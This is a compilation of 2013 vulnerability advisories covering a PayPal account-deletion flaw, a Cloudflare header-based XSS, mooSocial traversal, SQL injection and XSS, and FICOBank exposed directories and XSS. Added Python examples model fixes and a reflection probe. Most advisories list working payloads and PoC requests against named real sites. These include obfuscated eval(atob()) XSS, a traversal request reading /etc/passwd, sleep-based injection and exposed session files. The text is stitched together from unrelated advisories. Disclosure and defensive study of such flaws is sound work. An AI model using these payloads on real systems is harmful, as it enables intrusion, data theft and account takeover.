PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders. Originally, a PayPal account could be funded with an electronic debit from a bank account or by a credit card at the payer's choice. But some time in 2010 or early 2011, PayPal began to require a verified bank account after the account holder exceeded a predetermined spending limit. After that point, PayPal will attempt to take funds for a purchase from funding sources according to a specified funding hierarchy. If you set one of the funding sources as Primary, it will default to that, within that level of the hierarchy (for example, if your credit card ending in 4567 is set as the Primary over 1234, it will still attempt to pay money out of your PayPal balance before it attempts to charge your credit card). The funding hierarchy is a balance in the PayPal account; a PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master Card or Bill Me Later (if selected as primary funding source) (it can bypass the Balance); a verified bank account; other funding sources, such as non-PayPal credit cards. The recipient of a PayPal transfer can either request a check from PayPal, establish their own PayPal deposit account or request a transfer to their bank account.

PayPal is an acquirer, performing payment processing for online vendors, auction sites, and other commercial users, for which it charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient's account type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies. On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United States at eBay's North First Street satellite office campus. The company also has significant operations in Omaha, Nebraska, Scottsdale, Arizona, and Austin, Texas, in the United States, Chennai, Dublin, Kleinmachnow (near Berlin) and Tel Aviv. As of July 2007, across Europe, PayPal also operates as a Luxembourg-based bank. On March 17, 2010, PayPal entered into an agreement with China UnionPay (CUP), China's bankcard association, to allow Chinese consumers to use PayPal to shop online. PayPal is planning to expand its workforce in Asia to 2,000 by the end of the year 2010. Between December 4 and 9, 2010, PayPal services were attacked in a series of denial-of-service attacks organized by Anonymous in retaliation for PayPal's decision to freeze the account of WikiLeaks, citing terms of use violations over the publication of leaked US diplomatic cables.

(Copy of the Homepage: www.paypal.com)
[http://en.wikipedia.org/wiki/PayPal]

Abstract:
=========
An independent vulnerability laboratory researcher discovered a Web Vulnerability in the PayPal QR Labs Service Web Application.

Report-Timeline:
================
2012-04-27: Researcher Notification & Coordination (Cernica Ionut)
2013-04-28: Vendor Notification (PayPal Inc Security Incident Team - Bug Bounty Program)
2013-05-05: Vendor Response (PayPal Inc Security Incident Team - Bug Bounty Program)
2013-08-20: Vendor Fix/Patch (PayPal Inc Developer Team - Bug Bounty Program Reward)
2013-08-21: Public Disclosure (Vulnerability Laboratory)

Status:
========
Published

Affected Products:
==================
PayPal Inc
Product: PayPal Account Service Application 2013 Q2

Exploitation-Technique:
=======================
Remote

Severity:
=========
Critical

Proof of Concept:
=================
The vulnerability can be exploited by remote attackers with a low-privilege PayPal application user account and without user interaction.
For demonstration or reproduce ...

After testing the web application paypal.com I discovered that if you have a US account and visit the following page (https://www.paypal.com/us/cgi-bin/?&cmd=_bc-signup&channel=1&promo=503), you can add a new email from that page. The problem is that even if the e-mail you try to add to your account is already registered with PayPal, the new e-mail will be added to your account as unconfirmed.

Delete any account on PayPal:
After you have added an existing email to your account, if you go to the account profile and delete the unconfirmed email, the original account will be deleted too.

Auth Bypass:
After you have removed the account, you can make another one with the same username and your desired password, but you will have no money and it is not confirmed.

Video PoC: http://www.youtube.com/watch?feature=player_embedded&v=Txj_uFYTVuo

Solution:
=========
2013-08-20: Vendor Fix/Patch (PayPal Inc Developer Team - Bug Bounty Program Reward)

Risk:
=====
The security risk of the session account auth bypass vulnerability is estimated as critical.

Credits:
========
Independent Security Researcher - Cernica Ionut Cosmin (ionut.cernica@whit3hat.com)

Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:  www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact:  admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com
Section:  video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social:   twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds:    vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website are trademarks of the vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get permission.

Copyright © 2013 | Vulnerability Laboratory

--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
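The report above describes two missing checks: the "add e-mail" step accepts an address that is already registered to someone else, and the "remove e-mail" step deletes by address alone, so removing the attacker's unconfirmed copy also removes the victim's confirmed one. The following is an added example that models both checks over an in-memory SQLite schema; it is not PayPal code, and the tables, account names and addresses are constructed for the demonstration.

```python
"""Ownership checks on the add-e-mail / remove-e-mail flow, added here as an
example; this is not PayPal code, only a model of the two missing checks the
report describes. Two accounts end up holding the same address because the
add step never asks whether the address already belongs to someone, and the
remove step deletes by address alone, so deleting the attacker's unconfirmed
copy takes the victim's confirmed one with it. Schema and rows are constructed.
"""
import sqlite3

VICTIM = "victim@example.com"   # constructed address


def make_db() -> sqlite3.Connection:
    """Two accounts, each with one confirmed address (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE account (id INTEGER PRIMARY KEY, name TEXT NOT NULL);
        CREATE TABLE email (
            account_id INTEGER NOT NULL REFERENCES account(id),
            address    TEXT    NOT NULL,
            confirmed  INTEGER NOT NULL DEFAULT 0
        );
        INSERT INTO account VALUES (1, 'victim'), (2, 'attacker');
        INSERT INTO email VALUES (1, 'victim@example.com', 1);
        INSERT INTO email VALUES (2, 'attacker@example.com', 1);
    """)
    return db


def add_email_unchecked(db, account_id: int, address: str) -> bool:
    """Reported behaviour: an address registered elsewhere is accepted as unconfirmed."""
    db.execute("INSERT INTO email (account_id, address, confirmed) VALUES (?, ?, 0)",
               (account_id, address))
    return True


def add_email_checked(db, account_id: int, address: str) -> bool:
    """Fix 1: an address present on any account is refused outright."""
    if db.execute("SELECT 1 FROM email WHERE address = ?", (address,)).fetchone():
        return False
    db.execute("INSERT INTO email (account_id, address, confirmed) VALUES (?, ?, 0)",
               (account_id, address))
    return True


def remove_email_vulnerable(db, account_id: int, address: str) -> int:
    """Reported behaviour: keyed on the address only; account_id is accepted but never used."""
    return db.execute("DELETE FROM email WHERE address = ?", (address,)).rowcount


def remove_email_fixed(db, account_id: int, address: str) -> int:
    """Fix 2: scoped to the acting account and to its own unconfirmed rows."""
    return db.execute(
        "DELETE FROM email WHERE account_id = ? AND address = ? AND confirmed = 0",
        (account_id, address)).rowcount


def victim_keeps_address(db) -> bool:
    row = db.execute(
        "SELECT 1 FROM email WHERE account_id = 1 AND address = ? AND confirmed = 1",
        (VICTIM,)).fetchone()
    return row is not None


def run_scenario(check_add: bool, scoped_delete: bool) -> bool:
    """Replay the report: the attacker (account 2) adds the victim's address, then
    removes it. Returns whether the victim's confirmed address survives."""
    db = make_db()
    add = add_email_checked if check_add else add_email_unchecked
    remove = remove_email_fixed if scoped_delete else remove_email_vulnerable
    if add(db, 2, VICTIM):
        remove(db, 2, VICTIM)
    return victim_keeps_address(db)


def rows_deleted_by_attacker(scoped_delete: bool) -> int:
    """How many rows one delete by the attacker removes once the duplicate exists."""
    db = make_db()
    add_email_unchecked(db, 2, VICTIM)
    remove = remove_email_fixed if scoped_delete else remove_email_vulnerable
    return remove(db, 2, VICTIM)


if __name__ == "__main__":
    print("no checks, victim keeps address:     ", run_scenario(False, False))  # False
    print("scoped delete only:                  ", run_scenario(False, True))   # True
    print("uniqueness check only:               ", run_scenario(True, False))   # True
    print("rows removed by unscoped delete:     ", rows_deleted_by_attacker(False))  # 2
```

Either fix alone blocks the reported deletion; both together are what you want, since the uniqueness check stops the duplicate from ever existing while the scoped delete keeps a future regression in the add path from becoming account takeover again.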
-
Description : Cloudflare suffers from a cross site scripting vulnerability.
Author : Glenn Grant
Source : Cloudflare Cross Site Scripting ≈ Packet Storm
Code :

Details below of an XSS vulnerability I discovered in Cloudflare (markdown format)

- Glenn | /dev/alias
* http://blog.devalias.net
* http://devalias.net

-----

**Reference Number:** DAHAX-2013-001 (/dev/alias/hacks 2013-001)

**Notification Timeline:**

* 10/07/2013, Request# 38713 (https://support.cloudflare.com/anonymous_requests/new)
* 10/07/2013, Vendor looking into issue
* 16/07/2013, Updated vendor with new details (Length: 101 instead of 72)
* 16/07/2013, Vendor requested that I test again
* [No further response from vendor]
* 01/08/2013, Tested again, vulnerability fixed

**Details Published:** 14/08/2013 (http://blog.devalias.net/post/58217238426/dahax-2013-001-cloudflare-xss-vulnerability)

## What?

* Reflected XSS (cross site scripting) attack

## Where's Affected?

* Theoretically it seems that any page that uses Cloudflare will be affected.
    - Eg: http://www.cloudflare.com/

## How?

* **To bring up the vulnerable page**
    - Set your X-Forwarded-For header to <del>72+</del> 101+ characters
    - <del>Eg: X-Forwarded-For: AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDDEEEEEEEEEEFFFFFFFFFFGGGGGGGGGGHH</del>
    - Eg: <pre>X-Forwarded-For: AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDDEEEEEEEEEEFFFFFFFFFFGGGGGGGGGGHHHHHHHHHHIIIIIIIIIIJJJJJJJJJJK</pre>
    - Load a site using Cloudflare
    - You should end up on the "DNS Points to Prohibited IP" page
* **To trigger the XSS**
    - Set your User-Agent string to the XSS attack
    - Eg: <pre>User-Agent: USER-AGENT being tested for XSS..<script>alert('Vulnerable to XSS via USER-AGENT header [Found by devalias.net]')</script></pre>
* **The whole attack**
    - Ensure your X-Forwarded-For and User-Agent headers are configured as above
    - Navigate to a page using Cloudflare
    - ???
    - Profit!

## Who?

* Discovered by [Glenn '/dev/alias' Grant](http://www.devalias.net/) (glenn@devalias.net)

## Responsible Disclosure Notice

* Following in the footsteps of Google's vulnerability disclosure timeline, unless otherwise agreed to beforehand, I reserve the right to publicly announce the details of any discovered vulnerabilities 7 days post notification.
* **Google's Rationale:** "Seven days is an aggressive timeline and may be too short for some vendors to update their products, but it should be enough time to publish advice about possible mitigations, such as temporarily disabling a service, restricting access, or contacting the vendor for more information. As a result, after 7 days have elapsed without a patch or advisory, we will support researchers making details available so that users can take steps to protect themselves. By holding ourselves to the same standard, we hope to improve both the state of web security and the coordination of vulnerability management." - [Google](http://googleonlinesecurity.blogspot.com.au/2013/05/disclosure-timeline-for-vulnerabilities.html)
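The recipe above has two moving parts: an over-long X-Forwarded-For that routes the request onto the edge's error page, and a User-Agent that the error page echoes without encoding. The following is an added example of a probe for that class of header reflection; it is not the researcher's tooling. It wraps a random marker in angle brackets so that a raw echo and an HTML-escaped echo are distinguishable, keeps the network call in a single function, and classifies constructed response bodies offline. The 101-byte threshold and the AAAAAAAAAABBBBBBBBBB padding pattern are taken from the advisory.

```python
"""Reflected-header XSS probe, added here as an example; it is not the advisory
author's tooling. build_probe_headers() reproduces the advisory's headers with
a random marker, classify_reflection() decides whether a response body echoes
the marker raw, HTML-escaped, or not at all, and probe() is the only function
that touches the network. The sample bodies in __main__ are constructed.
"""
import html
import secrets
import urllib.error
import urllib.request
from typing import Optional

XFF_MIN_LEN = 101  # length the researcher reported as necessary to reach the error page


def build_probe_headers(marker: str, xff_len: int = XFF_MIN_LEN) -> dict:
    """X-Forwarded-For padded to xff_len bytes in the AAAAAAAAAABBBBBBBBBB... pattern
    used in the advisory; the marker rides in User-Agent wrapped in angle brackets,
    so an entity-encoding echo and a raw echo look different in the body."""
    if xff_len < 1:
        raise ValueError("xff_len must be positive")
    xff = "".join(chr(ord("A") + (i // 10) % 26) for i in range(xff_len))
    return {"X-Forwarded-For": xff, "User-Agent": f"probe-<{marker}>"}


def classify_reflection(body: str, marker: str) -> str:
    """'unescaped' if the bracketed marker appears verbatim, 'escaped' if only the
    entity-encoded form appears, 'absent' otherwise."""
    raw = f"probe-<{marker}>"
    if raw in body:
        return "unescaped"
    if html.escape(raw, quote=False) in body:
        return "escaped"
    return "absent"


def probe(url: str, marker: Optional[str] = None, timeout: float = 10.0) -> str:
    """Send the probe to url and classify the response body. Error responses are
    read as well, because the vulnerable page in the advisory was an error page."""
    marker = marker or secrets.token_hex(8)
    req = urllib.request.Request(url, headers=build_probe_headers(marker))
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            charset = resp.headers.get_content_charset() or "utf-8"
            body = resp.read().decode(charset, "replace")
    except urllib.error.HTTPError as err:
        body = err.read().decode("utf-8", "replace")
    return classify_reflection(body, marker)


if __name__ == "__main__":
    m = "deadbeef"
    vulnerable_page = f"<p>Your browser: probe-<{m}></p>"       # constructed body
    fixed_page = f"<p>Your browser: probe-&lt;{m}&gt;</p>"      # constructed body
    print(classify_reflection(vulnerable_page, m))  # unescaped
    print(classify_reflection(fixed_page, m))       # escaped
```

Run `probe("https://example.invalid/")` against a host you are authorised to test; "unescaped" means the User-Agent reached the page body without encoding, which is the condition the advisory relied on, while "escaped" means the echo exists but is neutralised.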
-
Description : mooSocial version 1.3 suffers from cross site scripting and local file inclusion vulnerabilities.
Author : Esac
Source : mooSocial 1.3 Cross Site Scripting / Local File Inclusion ≈ Packet Storm
Code :

###########################################################################################
#Exploit Title: mooSocial 1.3 - Multiple Vulnerabilities
#Official site: http://www.moosocial.com
#Risk Level: High
#Demo : http://demo.moosocial.com
#Exploit Author: Esac
#Homepage author : www.iss4m.ma
#Last Checked: 22/08/2013
###########################################################################################

+----------+
| OVERVIEW |
+----------+

mooSocial is a social networking script built on top of the CakePHP 2 framework. It has all the features to build a successful community (e.g. blog, photo, group, event, video, topic...). mooSocial is a premium product { Standard Version : $149 Developer Version : $449 }

+-----------------------------------------------------------------------------------+

+----------------------------+
| Directory Traversal / LFI  |
+----------------------------+

mooSocial is vulnerable to a directory traversal / local file inclusion vulnerability; as a result, it was possible for an attacker to load webserver-readable files from the local filesystem (and to execute PHP stored on the server).

+--------------------+
| How did it work?   |
+--------------------+

In the PHP code of the mooSocial website there is a controller called PagesController.php that is used to load static / semi-static pages. The exact name of the page to be loaded is determined by the query string: for example, http://www.demo.moosocial.com/pages/chat loads the site chat page, which is stored as a template in the system.

I used the Burp Suite tool to intercept the data because there is a redirection here when we put something else after the root path.

Vulnerable code:
...................

class PagesController extends AppController {

    public function display() {
        $path = func_get_args();

        $count = count($path);
        if (!$count) {
            $this->redirect('/');
        }
        $page = $subpage = $title_for_layout = null;

        if (!empty($path[0])) {
            $page = $path[0];
        }
        if (!empty($path[1])) {
            $subpage = $path[1];
        }
        if (!empty($path[$count - 1])) {
            $title_for_layout = Inflector::humanize($path[$count - 1]);
        }
        $this->set(compact('page', 'subpage', 'title_for_layout'));

        // check if site is offline
        $moo_setting = $this->_getSettings();
        $uid = $this->Session->read('uid');
        if ( !empty( $moo_setting['site_offline'] ) && !is_root_admin( $uid ) ) {
            $this->layout = '';
            $this->set('offline_message', $moo_setting['offline_message']);
            $this->render('/Elements/misc/offline');
        } else
            $this->render(implode('/', $path));
    }
}

This code is vulnerable to a directory traversal attack: the $path, which is used to load a template, is directly tied to user input (the arguments to the function here are the elements of the query string). By sending URL slashes (/), it was possible to break out of the current directory and traverse via a relative path to any directory on the system. It was also possible to convince CakePHP (the framework used here) to load files without the ctp file extension associated with templates by including a URL null byte (%00) at the end of the URL.

+------------------+
| PROOF OF CONCEPT |
+------------------+

http://demo.moosocial.com/pages/../../../../../../../../../../etc/passwd%00

Request Headers:

GET /pages/../../../../../../../../../../etc/passwd%00 HTTP/1.1
Host: demo.moosocial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close

Response Headers:

HTTP/1.1 404 Not Found
Date: Thu, 22 Aug 2013 04:56:29 GMT
Server: Apache
Set-Cookie: CAKEPHP=r7t684gq0po1spmqpp5634p2l3; expires=Thu, 22-Aug-2013 05:26:29 GMT; path=/
Content-Length: 37338
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

Response Raw:

//source code of the page
.........................
root:x:0:0::/ramdisk/root:/ramdisk/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
........................

+--------------------------------+
| Time-Based Blind Injection     |
+--------------------------------+

http://demo.moosocial.com/blogs/view/{Inject here}

Real exploitation:

http://demo.moosocial.com/blogs/view/1 and sleep(2)  ==> will pause for 2 seconds and then display the page
http://demo.moosocial.com/blogs/view/1 and sleep(10) ==> will pause for 10 seconds and then display the page

+-----+
| XSS |
+-----+

//all XSS tested on Mozilla Firefox
http://demo.moosocial.com/tags/view/"><img src="a" onerror='eval(atob("cHJvbXB0KDEpOw=="))'
http://demo.moosocial.com/albums/ajax_browse/"><img src="a" onerror='eval(atob("cHJvbXB0KDEpOw=="))'
http://demo.moosocial.com/blogs/ajax_browse/"><img src="a" onerror='eval(atob("cHJvbXB0KDEpOw=="))'
http://demo.moosocial.com/topics/ajax_browse/"><img src="a" onerror='eval(atob("cHJvbXB0KDEpOw=="))'
http://demo.moosocial.com/groups/ajax_browse/"><img src="a" onerror='eval(atob("cHJvbXB0KDEpOw=="))'
http://demo.moosocial.com/videos/ajax_browse/"><img src="a" onerror='eval(atob("cHJvbXB0KDEpOw=="))'

//The input is reflected inside a <script> tag between single quotes
http://demo.moosocial.com/groups/view/10/video_id:'';!--'<XSS>=&{()}
http://demo.moosocial.com/groups/view/10/topic_id:'';!--'<XSS>=&{()}

XSS via POST method:

POST /videos/ajax_embed HTTP/1.1
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
Cookie: CAKEPHP=u3e5q7ut90nhcg7ao1e9c8tni4; mooSocial[language]=Q2FrZQ%3D%3D.9%2F79; mooSocial[theme]=Q2FrZQ%3D%3D.%2FvHjC2hN; mooSocial[activity_feed]=Q2FrZQ%3D%3D.9%2Bb%2FFmVNBY8%3D
Host: demo.moosocial.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*

source=youtube&source_id=" onmouseover=prompt(976681) bad="

+--------------------------------------------------------------------------------------+

Knowledge is not an Object, it's a flaw

Greetz : White Tarbouch TEAM - Cobra
WwW.Iss4m.Ma
./Issam IEBOUBEN Aka Esac
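The display() action above hands the URL segments to render() with no validation, which is why both the `..` segments and the trailing `%00` work. The following is an added example (not mooSocial's or CakePHP's code) that first reproduces that behaviour so the PoC path can be traced to /etc/passwd, then shows the replacement: allow-list each segment, cap the depth at page/subpage, and confirm the normalised path is still under the template directory. TEMPLATE_ROOT is an assumed install path; the NUL-truncation branch in vulnerable_resolve() models the behaviour the advisory attributes to the framework, not a reading of its source.

```python
"""Template-name handling for a /pages/<segments> route, added here as an example
(not mooSocial's or CakePHP's code). vulnerable_resolve() reproduces what the
display() action above amounts to: implode the URL segments and render the
result, suffixed with .ctp unless a NUL byte ends the string first (as the
advisory describes). safe_resolve() is the replacement. TEMPLATE_ROOT is an
assumed path.
"""
import posixpath
import re
from typing import List, Optional
from urllib.parse import unquote

TEMPLATE_ROOT = "/var/www/moosocial/app/View/Pages"   # assumed location of the Pages templates
SEGMENT_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")         # what a static page name may look like
MAX_DEPTH = 2                                            # display() only uses $path[0] and $path[1]


def url_segments(path: str) -> List[str]:
    """Split the request path after /pages/ into the args display() receives,
    URL-decoded so that %00 arrives as a real NUL byte, as in the PoC."""
    decoded = unquote(path)
    prefix = "/pages/"
    if not decoded.startswith(prefix):
        raise ValueError("not a /pages/ route")
    return decoded[len(prefix):].split("/")


def vulnerable_resolve(segments: List[str]) -> str:
    """implode('/', $path) + render(): no validation, '..' survives, NUL drops the suffix."""
    name = "/".join(segments)
    if "\x00" in name:
        name = name.split("\x00", 1)[0]       # NUL truncation the advisory relies on
    else:
        name += ".ctp"
    return posixpath.normpath(posixpath.join(TEMPLATE_ROOT, name))


def safe_resolve(segments: List[str]) -> Optional[str]:
    """Return the template path, or None when the request must be rejected (404)."""
    if not segments or len(segments) > MAX_DEPTH:
        return None
    for seg in segments:
        if not SEGMENT_RE.fullmatch(seg):      # rejects '.', '/', NUL, '%' and empty segments
            return None
    candidate = posixpath.normpath(posixpath.join(TEMPLATE_ROOT, *segments) + ".ctp")
    if not candidate.startswith(TEMPLATE_ROOT + "/"):
        return None                           # belt and braces: never serve outside the root
    return candidate


if __name__ == "__main__":
    poc = url_segments("/pages/../../../../../../../../../../etc/passwd%00")
    print(vulnerable_resolve(poc))   # /etc/passwd
    print(safe_resolve(poc))         # None
    print(safe_resolve(url_segments("/pages/chat")))  # .../Pages/chat.ctp
```

The allow-list does the real work; the final prefix check is there so that a later loosening of SEGMENT_RE cannot silently reopen traversal.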
-
Description : FICOBank suffers from exposed directory listing and cross site scripting vulnerabilities. They do not believe any of this is an issue and if you use them, you should change banks immediately.
Author : Juan Carlos Garcia
Source : FICOBank Information Disclosure / Cross Site Scripting ≈ Packet Storm
Code :

FICOBank Directory Listing Information Disclosure / Cross Site Scripting / jQuery Old Version Vulnerable

Report-Timeline:
================
23-08-2013 Advisory Response: "Our country does not have the same laws as their own and we do not consider to be security flaws the data you send us. Thank you very much"
( /ME I don't understand this response.. Is it a joke? )
20-08-2013 Full Disclosure

I-VULNERABILITY
-------------------------
#Title: FICOBank Directory Listing Information Disclosure / Cross Site Scripting / jQuery Old Version Vulnerable
#Vendor: http://www.ficobank.com / http://ficobank.com
#Author: Juan Carlos García (@secnight)
#Follow me: http://www.highsec.es  Twitter: @secnight

II-Introduction:
=============
The First Isabela Cooperative Bank (FICOBank) is one of the pioneer and prominent cooperative banks in the Philippines. Its origin is deeply rooted in the community, as it was organized 36 years ago by two cooperatives and 47 samahang nayons, which represented the farmers who have limited resources and access to banking services. From the molehill-size cooperative rural bank that it opted to be, it has grown into a mountain-high cooperative bank, as it can now lay claim to a resource base of over Php 2.37 billion (as of December 31, 2012).
-------------------------

III-PROOF OF CONCEPT
====================

Attack details
--------------

Directory Listing
*****************
The web server is configured to display the list of files contained in this directory. This is not recommended because the directory may contain files that are not normally exposed through links on the web site. A user can view a list of all files in this directory, possibly exposing sensitive information.

Affected items
http://ficobank.com/annualreport/
/annualreport
/annualreport/_notes
/annualreport/annualreport
/Assets4Sale
/Assets4Sale/a4sale
/Assets4Sale/a4sale/_notes
/contact
/contact/_notes
/contact/html-contact-form-captcha
/contact/html-contact-form-captcha/_notes
/contact/html-contact-form-captcha/scripts
/contact/html-contact-form-captcha/scripts/_notes
/contact/scripts
/contact/scripts/_notes
/contact/scripts-old
/contact/scripts-old/_notes
/DepositProducts
/DepositProducts/_notes
/Ficonnect
/flash
/flash/_notes
/images
/images/awards
/images/images
/images/jobopening
/images/jobopening/_notes
/images/officer
/images/signature
/images/signature/_notes
/images/slides
/Leadership
/LoanProducts
/news
/news/_notes
/OtherServices
/OtherServices/_notes
/scripts
/scripts/_notes
/Stylesheet
/Stylesheet/_notes

Temporary file/directory
Affected items
http://www.ficobank.com/tmp/
/tmp
/tmp/mailError.log
/tmp/sess_secnightsessionfixation
/tmp/sess_b35e89c88df72a4c589a5a8e1a495594
/tmp/sess_f277f2a2689ac1ee7b04b527b80b9b7c
/tmp/untitled

File Lock
These lock files often contain the username of the user that has locked the file. Username harvesting can be done using this technique...
http://www.ficobank.com/DepositProducts/

Cross Site Scripting
********************
Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of JavaScript) to another user. Because a browser cannot know whether the script should be trusted or not, it will execute the script in the user context, allowing the attacker to access any cookies or session tokens retained by the browser. Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user in order to gather data from them. An attacker can steal the session cookie and take over the account, impersonating the user. It is also possible to modify the content of the page presented to the user.

Affected items

/contact/contactus.php
URL encoded POST input email was set to sample%40email.tst' onmouseover=prompt(947854) bad='
The input is reflected inside a tag parameter between single quotes.
Variant email(2)
6_letters_code=94102&email=sample%2540email.tst%27%20onmouseover%3dprompt%28947854%29%20bad%3d%27&message=20&name=secnight&submit=Submit
6_letters_code=94102&email=sample%2540email.tst%27%20onmouseover%3dprompt%28924627%29%20bad%3d%27&message=20&name=jjxlxmqv&submit=Submit
Variant Name
URL encoded POST input name was set to secnight' and jjxlxmqv' onmouseover=prompt(991722) bad='
The input is reflected inside a tag parameter between single quotes.
POST /contact/contactus.php
6_letters_code=94102&email=sample%40email.tst&message=20&name=secnight%27%20onmouseover%3dprompt%28991722%29%20bad%3d%27&submit=Submit
6_letters_code=94102&email=sample%40email.tst&message=20&name=jjxlxmqv%27%20onmouseover%3dprompt%28991722%29%20bad%3d%27&submit=Submit

/contact/email.php
URI was set to #" onmouseover=prompt(919235) //
The input is reflected inside a tag parameter between double quotes.
GET /contact/email.php/%F6%22%20onmouseover=prompt(919235)%20//

/contact/email.php.bak
URI was set to #" onmouseover=prompt(994575) //
GET /contact/email.php.bak/%F6%22%20onmouseover=prompt(994575)%20//

/contact/email.php.BAK
URI was set to #" onmouseover=prompt(924567) //
The input is reflected inside a tag parameter between double quotes.
GET /contact/email.php.BAK/%F6%22%20onmouseover=prompt(924567)%20//

/contact/html-contact-form-captcha/html-contact-form.php (4)
URL encoded POST input email was set to sample%40email.tst' onmouseover=prompt(913822) bad='
POST /contact/html-contact-form-captcha/html-contact-form.php
6_letters_code=94102&email=sample%2540email.tst%27%20onmouseover%3dprompt%28913822%29%20bad%3d%27&message=20&name=fpfvlamn&submit=Submit

/contact/samplexyz.php (7)
URL encoded POST input contactname was set to pdnfeddf" onmouseover=prompt(969944) bad="
POST /contact/samplexyz.php
contactname=pdnfeddf%22%20onmouseover%3dprompt%28969944%29%20bad%3d%22&email=sample%40email.tst&subject=1
Variants contactname, email, subject

/contact/samplexyz.php.bak
URI was set to #" onmouseover=prompt(959358) //
The input is reflected inside a tag parameter between double quotes.
GET /contact/samplexyz.php.bak/%F6%22%20onmouseover=prompt(959358)%20//

/contact/samplexyz.php.BAK
URI was set to #" onmouseover=prompt(966989) //
GET /contact/samplexyz.php.BAK/%F6%22%20onmouseover=prompt(966989)%20//

/contactus.php (4)
Variant email, name
email(3)
URL encoded POST input email was set to sample%40email.tst' onmouseover=prompt(971885) bad='
6_letters_code=94102&email=sample%2540email.tst%27%20onmouseover%3dprompt%28971885%29%20bad%3d%27&message=20&name=bxaskxpx&submit=Submit
name(1)
URL encoded POST input name was set to iwelgyng' onmouseover=prompt(991324) bad='
6_letters_code=94102&email=sample%40email.tst&message=20&name=iwelgyng%27%20onmouseover%3dprompt%28991324%29%20bad%3d%27&submit=Submit

jQuery Old Version Vulnerable
***************************
jQuery JavaScript Library v1.4.2
This problem was fixed in jQuery 1.6.3. This page is using an older version of jQuery that is vulnerable to a Cross Site Scripting vulnerability. Many sites use it to select elements via location.hash, which allows someone to inject script into the page. $("#id") is a CSS selector, $("<img>") is createElement, and $("#<img>") is createElement too.

Affected items

/OtherServices/fade.min.js
GET /OtherServices/fade.min.js
Response:
HTTP/1.1 200 OK
Date: Fri, 23 Aug 2013 15:48:45 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 13 Dec 2011 07:09:36 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Age: 0
Connection: keep-alive
Server: YTS/1.20.28

/OtherServices/jquery.fade.js
GET /OtherServices/jquery.fade.js jquery_xss/#<img src=/ onerror=alert(1)>
Response
HTTP/1.1 200 OK
Date: Fri, 23 Aug 2013 15:48:46 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 13 Dec 2011 07:09:52 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Age: 0
Connection: keep-alive
Server: YTS/1.20.28
Content-Length: 72174

/scripts/fade.min.js
GET /scripts/fade.min.js
Response
HTTP/1.1 200 OK
Date: Fri, 23 Aug 2013 15:48:46 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Thu, 11 Jul 2013 03:44:10 GMT
